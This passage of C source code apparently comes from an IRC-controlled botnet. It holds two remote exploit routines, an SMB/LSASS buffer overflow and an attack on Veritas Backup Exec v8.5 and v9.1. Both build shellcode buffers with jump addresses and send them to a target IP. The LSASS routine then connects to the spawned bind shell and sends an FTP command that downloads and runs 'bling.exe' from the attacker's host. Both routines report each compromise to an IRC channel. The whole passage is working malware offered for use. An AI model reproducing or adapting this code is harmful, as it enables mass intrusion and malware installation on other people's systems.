memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
memcpy(&buf[2036], &bindshell, strlen(bindshell));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], &bindshell, strlen(bindshell));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, bindshell, strlen(bindshell));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
return FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
fclosesocket(sSocket);
return FALSE;
}
if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((targetx == 1) || (targetx == 2)) {
memcpy(screq2k, reqx8, sizeof(reqx8)-1);
memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
} else {
memcpy(screq, reqx7, sizeof(reqx7)-1);
memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
memset(&bsin, 0, sizeof(bsin));
bsin.sin_family = AF_INET;
bsin.sin_port = fhtons(LSASS_BSPORT);
bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
Sleep(500);
_snprintf(cmd_buff, sizeof(cmd_buff),
// "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
fclosesocket(sSocket);
fclosesocket(bSocket);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
} else
return FALSE;
}
BOOL VertiasBackupExec( EXINFO exinfo, VertiasBackupExec_Version eVersion )
{
char *pszVerString;
// ---
int nShellSize;
char szShellBuf[ 512 ];
// ---
SOCKET nFDSocket;
sockaddr_in ServerAddr;
// ---
int nCounter;
// prepare version depending data
if( eVersion == Backup_Exec_v9_1_4691_SP1_SP0 )
{
memcpy( &talk[ 37 ], &v91sp0sp1, 4 );
memcpy( &talk[ 72 ], &esisp0sp1, 4 );
pszVerString = "v9.1.4691.0+1";
}
else if( eVersion == Backup_Exec_v8_5_3572 )
{
memcpy( &talk[ 37 ], &v85, 4 );
memcpy( &talk[ 72 ], &esiold, 4 );
pszVerString = "v8.5.3572";
}
else
return FALSE;
// get shellcode
nShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
if( !nShellSize )
return FALSE;
// create socket
nFDSocket = fsocket( AF_INET, SOCK_STREAM, IPPROTO_IP );
if( nFDSocket == INVALID_SOCKET )
return FALSE;
// connect to it
memset( &ServerAddr, 0, sizeof( ServerAddr ) );
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = fhtons( exinfo.port );
ServerAddr.sin_addr.s_addr = finet_addr( exinfo.ip );
if( fconnect( nFDSocket, (sockaddr*)&ServerAddr, sizeof( ServerAddr ) ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
// send talk
if( fsend( nFDSocket, talk, sizeof( talk ) - 1, 0 ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
Sleep( 10 );
// send payload(s)
for( nCounter = 0; nCounter < 7; nCounter++ )
{
if( fsend( nFDSocket, szShellBuf, strlen( szShellBuf ), 0 ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
Sleep( 10 );
}
Sleep( 1000 );
fclosesocket( nFDSocket );
// MESSAGE(S)
char buffer[ IRCLINE ];
_snprintf(buffer, sizeof(buffer), "[%s (%s)]: Exploiting IP: %s.", exploit[exinfo.exploit].name, pszVerString, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
